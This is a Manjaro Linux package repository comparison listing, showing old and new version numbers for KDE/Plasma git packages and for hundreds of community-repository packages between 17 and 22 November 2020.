                        karchive-git5.76.0.r439.ga196223-15.77.0.r440.g7304c28-1
                   kcalendarcore-git5.76.0.r1154.g5fd0c3824-15.77.0.r1157.gfeaa3ddf2-1
                         kconfig-git5.76.0.r744.gaf232ec-15.77.0.r745.g0d45601-1
                     kcoreaddons-git5.76.0.r1062.ge2ed639-15.77.0.r1067.g5b429bdd-1
                      kdeconnect-git20.08.0.r128.gbb619baa-120.08.0.r128.gbb619baa-2
                kdeplasma-addons-git5.20.80.r8423.gdd110f4a2-15.20.80.r8426.g247687bd1-1
                           kdesu-git5.77.0.r421.gb7ba89f-15.77.0.r422.g58bd2da-1
                        kdisplay-git5.20.80.r1428.g4a8202a-15.20.80.r1428.g4a8202a-2
                          kdnssd-git5.76.0.r270.g3c68922-15.77.0.r272.g06c6742-1
                       kdoctools-git5.76.0.r571.gbf82212-15.77.0.r572.g0824f36-1
                      kguiaddons-git5.77.0.r316.g43e657c-15.77.0.r318.g3baa1ed-1
                       kholidays-git5.76.0.r886.ge1f179b-15.77.0.r890.ge31172f-1
                        khotkeys-git5.20.80.r2035.g2e997a0-15.20.80.r2036.gebc3c0f-1
                           ki18n-git5.77.0.r419.g0db5992-15.77.0.r420.g707c477-1
                     kiconthemes-git5.77.0.r451.g3830e19-15.77.0.r453.ge12e24b-1
                     kinfocenter-git5.20.80.r1767.g214aa96-15.20.80.r1768.g176ea1d-1
                             kio-git5.76.0.r4318.g3b244b9d-15.77.0.r4322.g9430379b-1
                       kirigami2-git5.76.0.r2515.geb07d16a-15.77.0.r2522.g07876274-1
                     kitemmodels-git5.76.0.r486.g1d2606f-15.77.0.r487.g0b3c879-1
                      kitemviews-git5.76.0.r286.g4dbf8b8-15.77.0.r287.ga0c7ca2-1
                             kjs-git5.76.0.r298.g1a415a5-15.77.0.r299.g7b33575-1
                      knetattach-git5.20.80.r7988.g880d3a748-15.20.80.r8006.g3ae6b172f-1
                       knewstuff-git5.77.0.r964.g2a25a25b-15.77.0.r965.g858dec4c-1
                  knotifications-git5.76.0.r579.gc025f28-15.77.0.r582.g0e24073-1
                          kparts-git5.77.0.r449.g53db5d1-15.77.0.r450.g3ddc8d6-1
                       kplotting-git5.76.0.r247.g4648c34-15.77.0.r248.g012590b-1
                       krecorder-git        r66.f72b615-1        r66.f72b615-2
                   kscreenlocker-git5.20.80.r808.g5acbf74-15.20.80.r810.ga51dcaf-1
                        kservice-git5.77.0.r831.g1cc298b-15.77.0.r832.g24e0816-1
                       ksysguard-git5.20.80.r3418.g3a30493b-15.20.80.r3440.g85e3e7dd-1
                     ktexteditor-git5.77.0.r2542.g1fb9e63c-15.77.0.r2543.g456170c4-1
                    ktextwidgets-git5.76.0.r345.g2fd36ba-15.77.0.r346.g8b89dcc-1
                   kuserfeedback-git       r704.83982f1-1       r705.1d3f374-1
                         kwallet-git5.77.0.r1017.gfe18fa0-15.77.0.r1018.g492a60e-1
                        kwayland-git5.76.0.r1034.g6710f4b-15.77.0.r1035.gd49c85a-1
                 kwayland-server-git5.20.80.r1182.gd70552f-15.20.80.r1186.gbcf9078-1
                        kweather-git    0.3.r1.gc13638d-1    0.3.r2.g7b633ae-1
                  kwidgetsaddons-git5.76.0.r728.g5aed5c31-15.77.0.r731.ge7d0a893-1
                            kwin-git5.20.80.r18638.gcb9ccdb0f-15.20.80.r18653.g786207a4b-1
                   kwindowsystem-git5.77.0.r539.g40bbc4c-15.77.0.r540.gc338446-1
                          kwinft-git5.20.80.r18120.gdc3bbd5ab-15.20.80.r18120.gdc3bbd5ab-2
                         kxmlgui-git5.76.0.r676.g28a80ab-15.77.0.r677.g717ced2-1
                      libkscreen-git5.20.80.r1547.gb05af98-15.20.80.r1548.g788656c-1
                    libksysguard-git5.20.80.r2005.g04e96f6-15.20.80.r2008.g1c0a168-1
     libnautilus-extension-typeahead             3.38.1-1             3.38.2-1
                maliit-framework-git0.99.1.r54.gee7d872c-10.99.1.r54.gee7d872c-2
               manjaro-arm-installer              1.3.6-1              1.3.6-2
               manjaro-jade-settings           20201029-1           20201120-1
                         mauikit-git  1.2.0.r0.g65adde8-1  1.2.0.r0.g65adde8-2
            microsoft-office-web-jak            1:2.1.0-2            1:2.1.1-2
                 modemmanager-qt-git5.76.0.r472.gfc17b8a-15.77.0.r473.g4323704-1
                  nautilus-typeahead             3.38.1-1             3.38.2-1
               networkmanager-qt-git5.76.0.r1068.g043524a-15.77.0.r1069.gf8adcd9-1
                   okular-mobile-git20.08.3.r146.g3c1fa441d-120.11.80.r9.ga83261db9-1
           onlyoffice-desktopeditors              6.0.1-1              6.0.2-1
                  plasma-desktop-git5.20.80.r7988.g880d3a748-15.20.80.r8006.g3ae6b172f-1
                plasma-framework-git5.77.0.r15650.g390ae7209-15.77.0.r15674.g750deb933-1
                       plasma-nm-git5.20.80.r2978.g350899d6-15.20.80.r2979.gc6b9d6c7-1
         plasma-phone-components-git5.19.90.r36.gd2f4208-15.19.90.r47.g7183475-1
                      plasma-sdk-git5.20.80.r2226.g9ee0148a-15.20.80.r2228.g26c62193-1
                 plasma-settings-git       r817.4756c30-1       r818.2b3c48e-1
          plasma-wayland-session-git5.20.80.r9650.g0eac817df-15.20.80.r9667.g4a1bf5c19-1
                plasma-workspace-git5.20.80.r9650.g0eac817df-15.20.80.r9667.g4a1bf5c19-1
                            popsicle0.1.5.r183.g1a67cff-1  1.3.0.r0.gb9d9332-1
                python-gtkspellcheck              4.0.5-1              4.0.6-1
         python-jade-application-kit              3.5.5-1              3.5.6-2
                           solid-git5.76.0.r618.gffc3078-15.77.0.r619.g6b0fa98-1
             syntax-highlighting-git5.76.0.r1381.gd6fed7b4-15.77.0.r1384.g9f363cac-1
                  systemsettings-git5.20.80.r2316.g8fcc3896-15.20.80.r2321.g204b44e9-1
                    telegram-desktop           2.4.10-0.2           2.4.11-0.1
                    threadweaver-git5.76.0.r456.g7c3448b-15.77.0.r457.gf59e10e-1
                           timeshift20.11.1.r1.g3391f69-220.11.1.r1.g3391f69-3
                            topgrade              5.9.0-1              6.0.0-1
                              ventoy             1.0.28-1             1.0.29-1
                        wrapland-git0.520.80.r1399.g4d4d11d-10.520.80.r1403.g6f4eead-2
                             xplayer              2.2.8-1              2.2.8-2
                             hotspot                    -            1.3.0-1.1
                         libquotient                    -              0.6.2-1
                       manjaro-hello                    -              0.6.6-3
                         neochat-git                    -     r1061.g2c7e7f4-1
                      rustc-demangle                    -           0.1.18-1.1


:: Different sync package(s) in repository community x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-11-17           2020-11-22
-------------------------------------------------------------------------------
                                agda            2.6.1.2-4            2.6.1.2-6
                             amsynth             1.12.1-1             1.12.2-1
                                 apm              2.5.0-4              2.6.0-1
                             arch-hs            0.4.0.0-5            0.4.0.0-7
                              ardour                6.3-3                6.4-1
                           babel-cli             7.12.1-1             7.12.7-1
                           bctoolbox              4.4.8-1              4.4.9-1
                             blender          17:2.90.1-2          17:2.90.1-4
                            bluefish             2.2.11-1             2.2.12-1
                           borgmatic             1.5.10-1             1.5.12-1
                       budgie-extras              1.0.2-1              1.1.0-1
                               bzrtp              4.4.8-1              4.4.9-1
                       cabal-install          3.2.0.0-107          3.2.0.0-109
                             caprine             2.51.0-1             2.51.1-1
                             chezmoi              1.8.8-1              1.8.9-1
                               clash              1.2.0-1              1.3.0-1
                            clipgrab              3.9.2-1              3.9.3-1
                        cmake-fedora              2.9.3-2              2.9.3-3
                                croc              8.6.4-1              8.6.6-1
                             cryptol             2.9.1-44             2.10.0-1
                               darcs            2.16.3-14            2.16.3-16
                             dbeaver              7.2.4-1              7.2.5-1
                        deepin-album           5.6.9.26-1           5.6.9.27-2
                   deepin-calculator            5.6.0.1-1            5.6.0.1-2
                    deepin-clipboard            5.3.0.5-1            5.3.0.5-2
                   deepin-compressor            5.8.0.9-2            5.8.0.9-3
               deepin-control-center           5.3.0.41-1           5.3.0.42-1
                         deepin-dock           5.3.0.17-1           5.3.0.19-2
                         deepin-draw           5.8.0.20-1           5.8.0.20-2
                 deepin-file-manager         1:5.2.0.63-1         1:5.2.0.64-2
                 deepin-image-viewer           5.6.3.27-1           5.6.3.27-2
                         deepin-kwin            5.2.0.2-3            5.2.0.2-4
                     deepin-launcher           5.3.0.24-1           5.3.0.26-1
                         deepin-menu              5.0.1-3              5.0.1-4
                        deepin-movie         1:5.7.6.99-1        1:5.7.6.106-1
                        deepin-music           6.0.1.64-1           6.0.1.68-1
              deepin-qt-dbus-factory           5.3.0.20-1           5.3.0.20-2
               deepin-qt5integration            5.1.0.9-1            5.1.0.9-2
          deepin-qt5platform-plugins             5.0.18-1             5.0.18-2
                       deepin-reader            5.8.0.1-1            5.8.0.1-2
              deepin-screen-recorder           5.8.0.32-1           5.8.0.32-2
                deepin-session-shell           5.3.0.24-1           5.3.0.27-1
                   deepin-session-ui           5.3.0.22-1           5.3.0.22-2
               deepin-system-monitor            5.8.0.3-1            5.8.0.3-2
                               dhall            1.36.0-12            1.36.0-14
                          dhall-bash            1.0.34-13            1.0.34-15
                          dhall-json             1.7.3-13             1.7.3-15
                    dhall-lsp-server            1.0.11-15            1.0.11-17
                          dhall-yaml             1.2.3-13             1.2.3-15
                               doctl             1.51.0-1             1.52.0-1
                              dtkgui           5.2.2.18-1           5.2.2.18-2
                           dtkwidget           5.2.2.19-1              5.3.0-2
                               dtkwm             2.0.12-9            2.0.12-10
                      efm-langserver             0.0.24-1             0.0.25-1
                           electron9              9.3.4-1              9.3.4-2
                              eslint             7.13.0-1             7.14.0-1
                           fcitx-qt5              1.2.5-2              1.2.5-3
                 firefox-dark-reader             4.9.23-1             4.9.24-1
           firefox-developer-edition             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-ach             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-af             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-an             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ar             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-ast             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-az             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-be             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-bg             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-bn             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-br             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-bs             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ca             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-ca-valencia       84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-cak             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-cs             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-cy             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-da             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-de             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-dsb             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-el             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-en-ca             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-en-gb             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-en-us             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-eo             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-es-ar             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-es-cl             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-es-es             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-es-mx             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-et             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-eu             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-fa             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ff             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-fi             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-fr             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-fy-nl             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-ga-ie             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-gd             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-gl             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-gn             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-gu-in             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-he             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-hi-in             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-hr             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-hsb             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-hu             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-hy-am             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ia             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-id             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-is             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-it             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ja             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ka             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-kab             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-kk             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-km             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-kn             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ko             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-lij             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-lt             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-lv             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-mk             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-mr             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ms             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-my             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-nb-no             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-ne-np             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-nl             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-nn-no             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-oc             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-pa-in             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-pl             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-pt-br             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-pt-pt             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-rm             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ro             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ru             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-si             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-sk             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-sl             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-son             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-sq             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-sr             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-sv-se             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ta             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-te             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-th             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-tl             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-tr             84.0b1-1             84.0b3-1
  firefox-developer-edition-i18n-trs             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-uk             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-ur             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-uz             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-vi             84.0b1-1             84.0b3-1
   firefox-developer-edition-i18n-xh             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-zh-cn             84.0b1-1             84.0b3-1
firefox-developer-edition-i18n-zh-tw             84.0b1-1             84.0b3-1
              firefox-tree-style-tab              3.6.1-1              3.6.2-1
               firefox-ublock-origin             1.30.6-1             1.31.0-1
                             fluxctl             1.20.2-1             1.21.0-1
                             freecad             0.18.4-4             0.18.4-5
                         gcompris-qt             0.97.1-1                1.0-1
                               giada             0.16.4-1             0.17.0-1
                           git-annex        8.20201103-11         8.20201116-5
                          git-repair       1.20200504-101       1.20200504-103
                  gnome-passwordsafe             3.99.2-1             4.beta-1
                              gnunet             0.13.3-1             0.14.0-1
                          googlemaps          20180602-14          20180602-15
                           gscan2pdf              2.9.1-1             2.10.0-1
                               gummi            2:0.8.1-1            2:0.8.1-2
                             haproxy              2.2.5-1              2.3.0-1
                haskell-authenticate            1.3.5-211            1.3.5-213
          haskell-authenticate-oauth          1.6.0.1-184          1.6.0.1-186
                         haskell-aws             0.22-143             0.22-145
           haskell-base64-bytestring           1.2.0.0-21            1.2.0.1-1
       haskell-cabal-install-parsers           0.3.0.1-32           0.3.0.1-34
                 haskell-casa-client            0.0.1-137            0.0.1-140
                  haskell-casa-types            0.0.1-113            0.0.1-115
                       haskell-cborg           0.2.4.0-41           0.2.4.0-42
                  haskell-cborg-json           0.2.2.0-71           0.2.2.0-72
                  haskell-cheapskate          0.1.1.2-186          0.1.1.2-188
                          haskell-ci            0.10.3-48            0.10.3-52
                    haskell-citeproc              0.1.1-2              0.1.1-3
               haskell-clash-prelude              1.2.5-2              1.2.5-3
               haskell-clientsession          0.9.1.2-175          0.9.1.2-176
                  haskell-commonmark              0.1.1-2            0.1.1.1-1
       haskell-commonmark-extensions           0.2.0.1-23            0.2.0.2-1
           haskell-commonmark-pandoc           0.2.0.1-20           0.2.0.1-22
               haskell-conduit-extra             1.3.5-64             1.3.5-65
                   haskell-criterion           1.5.7.0-29           1.5.7.0-31
          haskell-cryptonite-conduit            0.2.2-311            0.2.2-312
                         haskell-dav            1.3.4-199            1.3.4-201
                        haskell-dbus            1.2.16-59            1.2.16-60
               haskell-dbus-hslogger          0.1.0.1-111          0.1.0.1-112
                         haskell-dns             4.0.1-75             4.0.1-76
                haskell-doctemplates             0.8.2-61             0.8.2-62
                   haskell-esqueleto            3.4.0.0-3            3.4.0.1-2
                  haskell-fdo-notify            0.3.1-363            0.3.1-364
                        haskell-feed           1.3.0.1-68           1.3.0.1-69
          haskell-ghc-typelits-extra               0.4-34              0.4.1-1
                          haskell-gi             0.24.5-2             0.24.5-3
                    haskell-gi-cairo            1.0.24-21            1.0.24-22
                     haskell-git-lfs             1.1.0-67              1.1.1-1
                     haskell-githash           0.1.5.0-12           0.1.5.0-14
            haskell-hackage-security          0.6.0.1-113          0.6.0.1-115
                      haskell-hakyll          4.13.4.1-41          4.13.4.1-45
              haskell-hi-file-parser           0.1.0.0-75           0.1.0.0-76
                    haskell-hopenpgp              2.9.5-8             2.9.5-10
                       haskell-hpack            0.34.2-91            0.34.2-93
                   haskell-hspec-wai            0.11.0-24            0.11.0-25
              haskell-hspec-wai-json            0.11.0-26            0.11.0-27
                haskell-html-conduit          1.3.2.1-121          1.3.2.1-122
                        haskell-http         4000.3.15-37         4000.3.15-39
                 haskell-http-client           0.7.2.1-63              0.7.3-3
      haskell-http-client-restricted             0.0.3-67             0.0.3-69
             haskell-http-client-tls          0.3.5.3-325          0.3.5.3-327
                 haskell-http-common           0.8.2.1-30           0.8.2.1-31
                haskell-http-conduit          2.3.7.3-219          2.3.7.3-221
               haskell-http-download          0.2.0.0-156          0.2.0.0-158
                haskell-http-streams          0.8.7.2-100          0.8.7.2-102
                  haskell-httpd-shed          0.4.1.1-251          0.4.1.1-255
                         haskell-hxt         9.3.1.18-167         9.3.1.18-169
                haskell-implicit-hie            0.1.2.1-2            0.1.2.3-1
                       haskell-ipynb          0.1.0.1-111          0.1.0.1-112
                        haskell-jose             0.8.4-28             0.8.4-30
                   haskell-js-jquery            3.3.1-530            3.3.1-532
                         haskell-lsp          0.23.0.0-24          0.23.0.0-26
                    haskell-lsp-test          0.11.0.7-23          0.11.0.7-25
                   haskell-lsp-types          0.23.0.0-24          0.23.0.0-26
                   haskell-mime-mail             0.5.0-61             0.5.0-62
                haskell-monad-logger            0.3.35-37            0.3.35-38
                    haskell-mustache            2.3.1-207            2.3.1-209
                 haskell-network-uri          2.6.3.0-186          2.6.3.0-188
                       haskell-nonce            1.0.7-123            1.0.7-124
          haskell-openpgp-asciiarmor             0.1.2-63             0.1.2-64
             haskell-optparse-simple           0.1.1.3-50           0.1.1.3-52
                      haskell-ormolu            0.1.4.0-2            0.1.4.1-1
                      haskell-pantry            0.5.1.4-4            0.5.1.4-7
                  haskell-persistent           2.10.5.3-2           2.11.0.0-2
               haskell-persistent-qq             2.9.2-27             2.9.2-29
           haskell-persistent-sqlite         2.10.6.2-147           2.11.0.0-2
         haskell-persistent-template          2.8.2.3-123            2.9.1.0-2
             haskell-persistent-test          2.0.3.1-117            2.0.3.4-2
                  haskell-pipes-http            1.0.6-238            1.0.6-240
            haskell-project-template           0.2.1.0-40           0.2.1.0-41
                         haskell-req             3.7.0-13             3.7.0-15
                         haskell-rio          0.1.19.0-14          0.1.19.0-15
                 haskell-rio-orphans          0.1.1.0-183          0.1.1.0-184
             haskell-rio-prettyprint           0.1.1.0-38           0.1.1.0-39
                      haskell-sbv8.7               8.7-32                    -
                      haskell-scotty               0.12-4               0.12-6
                   haskell-serialise           0.2.3.0-57           0.2.3.0-58
                     haskell-servant             0.18.1-3             0.18.1-5
              haskell-servant-server             0.18.1-3             0.18.1-5
             haskell-servant-swagger            1.1.10-40            1.1.10-42
                       haskell-shake             0.19.2-2             0.19.2-4
             haskell-simple-sendfile           0.2.30-108           0.2.30-109
                 haskell-skylighting              0.10-12              0.10-14
            haskell-skylighting-core              0.10-12              0.10-14
                   haskell-snap-core           1.0.4.2-69           1.0.4.2-71
                 haskell-snap-server           1.1.2.0-12           1.1.2.0-16
                       haskell-store             0.7.7-25             0.7.7-26
           haskell-tagstream-conduit             0.5.6-54             0.5.6-55
        haskell-tamarin-prover-sapic             1.6.0-20             1.6.0-21
         haskell-tamarin-prover-term             1.6.0-15             1.6.0-17
       haskell-tamarin-prover-theory             1.6.0-20             1.6.0-21
        haskell-tamarin-prover-utils             1.6.0-13             1.6.0-14
                 haskell-tar-conduit            0.3.2-127            0.3.2-128
                     haskell-texmath          0.12.0.3-29          0.12.0.3-31
            haskell-text-conversions             0.3.1-12             0.3.1-13
              haskell-timezone-olson              0.1.9-7              0.2.0-1
               haskell-typed-process           0.2.6.0-60           0.2.6.0-61
                  haskell-uri-encode           1.5.0.7-17           1.5.0.7-19
              haskell-wai-app-static           3.1.7.2-56           3.1.7.2-58
                   haskell-wai-extra              3.1.2-4              3.1.2-5
          haskell-wai-handler-launch          3.0.3.1-148          3.0.3.1-150
                  haskell-wai-logger            2.3.6-158            2.3.6-159
       haskell-wai-middleware-static              0.9.0-4              0.9.0-6
              haskell-wai-websockets          3.0.1.2-185          3.0.1.2-186
                        haskell-warp           3.3.13-102           3.3.13-104
                    haskell-warp-tls             3.3.0-68             3.3.0-70
                  haskell-websockets          0.12.7.1-38          0.12.7.1-39
                        haskell-wreq          0.5.3.2-304          0.5.3.2-306
                 haskell-xml-conduit           1.9.0.0-71           1.9.0.0-72
                  haskell-xml-hamlet          0.5.0.1-158          0.5.0.1-159
                haskell-xss-sanitize            0.3.6-215            0.3.6-217
                       haskell-yesod           1.6.1.0-72           1.6.1.0-76
                  haskell-yesod-auth           1.6.10.1-6          1.6.10.1-10
                  haskell-yesod-core           1.6.18.6-4           1.6.18.7-2
                  haskell-yesod-form            1.6.7-292            1.6.7-296
            haskell-yesod-persistent            1.6.0.5-4            1.6.0.5-8
                haskell-yesod-static           1.6.1.0-92           1.6.1.0-96
                  haskell-yesod-test            1.6.10-93            1.6.10-97
                              hcloud             1.19.1-1             1.20.1-1
                           hedgewars            1.0.0-118            1.0.0-119
                                 hey              0.1.4-1              0.1.4-2
                         hledger-web            1.19.1-48            1.19.1-52
                              hoogle            5.0.18-83            5.0.18-85
                      hopenpgp-tools             0.23.2-8            0.23.2-10
                               idris            1.3.3-108            1.3.3-110
                                jmol           14.31.17-1           14.31.18-1
                               jsmol           14.31.17-1           14.31.18-1
                                 jwm              2.3.7-2              2.3.7-3
                                 k9s            0.23.10-1             0.24.0-1
                       kiwix-desktop              2.0.4-2              2.0.5-1
                           kiwix-lib              9.4.0-2              9.4.1-1
                         kiwix-tools              3.1.2-5              3.1.2-6
                              kstars            1:3.4.3-2            1:3.5.0-1
                            libfm-qt             0.16.0-1             0.16.0-2
                             libindi              1.8.6-1              1.8.7-1
                            libqtxdg              3.6.0-1              3.6.0-2
                              libzim              6.2.2-1              6.3.0-1
                              lutris            0.5.7.1-1              0.5.8-1
                              marked              1.2.4-1              1.2.5-1
                       mediastreamer              4.4.8-1              4.4.9-1
                            mednafen             1.24.3-1             1.26.1-1
                               mlite              0.3.0-1              0.3.1-1
                                 mpv           1:0.32.0-5           1:0.32.0-6
                         multimon-ng              1.1.8-2              1.1.9-1
                                musl              1.2.1-1              1.2.1-2
                             neomutt           20200925-1           20201120-1
               netfilter-fullconenat       r73.0cf3b48-62       r73.0cf3b48-63
                           nextcloud             20.0.1-1             20.0.2-1
              nextcloud-app-contacts              3.4.1-1              3.4.2-1
                  nextcloud-app-deck            1:1.2.0-1            1:1.2.1-1
                nextcloud-app-spreed           1:10.0.1-1           1:10.0.3-1
                    nextcloud-client              3.0.3-1              3.0.3-2
                     nginx-mod-naxsi                1.2-1                1.3-1
                                 nnn                3.4-1                3.5-1
                   npm-check-updates             10.2.1-1             10.2.2-1
                                 nsd              4.3.2-1              4.3.3-1
                            openlibm              0.7.2-1              0.7.3-1
                               opera      72.0.3815.320-1      72.0.3815.378-1
                 opera-ffmpeg-codecs      86.0.4240.183-1      86.0.4240.198-1
                                ortp              4.4.8-1              4.4.9-1
                     owncloud-client        2.6.3.14058-1         2.7.1.2530-1
                              oxipng              4.0.0-1              4.0.1-1
                              packer              1.6.4-1              1.6.5-1
                              pandoc           2.11.0.4-6          2.11.0.4-10
                     pandoc-citeproc          0.17.0.2-83          0.17.0.2-87
                     pandoc-crossref           0.3.8.2-21           0.3.8.2-25
                           partclone             0.3.15-1             0.3.17-1
                           postgrest            7.0.1-143            7.0.1-145
                            prettier              2.1.2-1              2.2.0-1
                           py3status               3.30-1               3.31-1
           python-aws-sam-translator             1.29.0-1             1.30.1-1
                     python-cfn-lint             0.40.0-1             0.41.0-1
          python-django-crispy-forms              1.9.2-1             1.10.0-1
                    python-dnspython              2.0.0-1           1:1.16.0-1
                  python-fastnumbers              3.0.0-1              3.1.0-1
                      python-gphoto2              2.2.1-1              2.2.4-1
                       python-hcloud              1.6.0-3             1.10.0-1
                        python-hglib              2.6.1-3              2.6.2-1
                      python-natsort              7.0.1-1              7.1.0-1
                     python-occ-core              7.4.0-17.4.1.r16.gfcf4e6ec-1
                      python-pikepdf              2.1.0-1              2.1.1-1
                  python-pymediainfo                4.3-1              5.0.2-1
                       python-sphinx              3.2.1-1              3.3.1-1
     python-sphinx-autodoc-typehints              1.8.0-3             1.11.1-1
                    python-tarantool              0.6.6-1 0.6.6.r25.gb267643-1
                      python2-genshi              0.7.3-1                    -
                   python2-tarantool              0.6.6-1 0.6.6.r25.gb267643-1
                                qcad           3.25.2.3-1           3.25.2.4-3
              qt5-ukui-platformtheme              1.0.5-1              1.0.5-2
                      radare2-cutter           1:1.12.0-1           1:1.12.0-3
                              rclone             1.53.2-1             1.53.3-1
               react-native-debugger             0.11.3-3             0.11.5-1
                          rebuilderd              0.6.0-1              0.7.0-1
                      rime-cantonese     0.0.0.20201117-1     0.0.0.20201118-1
                      ruby-test-unit              3.3.6-1              3.3.7-1
                                 sbt            1:1.4.1-1            1:1.4.2-1
                          shellcheck            0.7.1-183            0.7.1-187
                               shfmt              3.1.2-1              3.2.0-1
                             shotcut           20.09.27-1           20.11.14-1
                               sigil              1.4.0-1              1.4.1-3
                             skrooge             2.23.0-2             2.23.0-3
                            solidity              0.7.4-1              0.7.5-1
                               stack             2.5.1-26             2.5.1-29
                            startdde           5.6.0.12-1           5.6.0.13-1
                          strongswan              5.9.0-1              5.9.1-1
                          subsurface              4.9.6-3              4.9.9-1
                    subsurface-libdc              4.9.6-2              4.9.8-1
                               swtpm              0.5.0-1              0.5.1-1
                      tamarin-prover             1.6.0-48             1.6.0-53
                             taskell            1.10.1-40            1.10.1-42
      thunderbird-extension-enigmail              2.1.8-1              2.2.4-1
                               tiled              1.4.2-1              1.4.3-1
                               timew              1.4.2-1              1.4.2-2
                            tpm2-tss              3.0.1-1              3.0.2-2
                     tpm2-tss-engine              1.0.1-4              1.1.0-1
                   ttf-sarasa-gothic             0.15.1-1             0.15.2-1
                          typescript              4.0.5-1              4.1.2-1
                  ukui-window-switch              3.0.0-2              3.0.0-3
                             unbound             1.11.0-2             1.12.0-1
                               units               2.20-1               2.21-1
                             uranium              4.7.1-1              4.7.1-4
                               v2ray             4.32.1-1             4.33.0-1
         v2ray-domain-list-community     20201115055442-1     20201120043726-1
                         v2ray-geoip       202011150541-1       202011190012-1
                             vagrant             2.2.13-1             2.2.14-1
                           wgetpaste               2.29-1               2.30-1
                              xmobar              0.36-34              0.36-37
                             xonotic              0.8.2-5              0.8.2-6
                          youtube-dl         2020.11.17-1       2020.11.21.1-1
                        zerotier-one              1.5.0-2              1.6.0-1
                           zim-tools              2.0.0-2              2.1.0-1
                    haskell-floskell                    -             0.10.5-1
                    haskell-fourmolu                    -            0.3.0.0-1
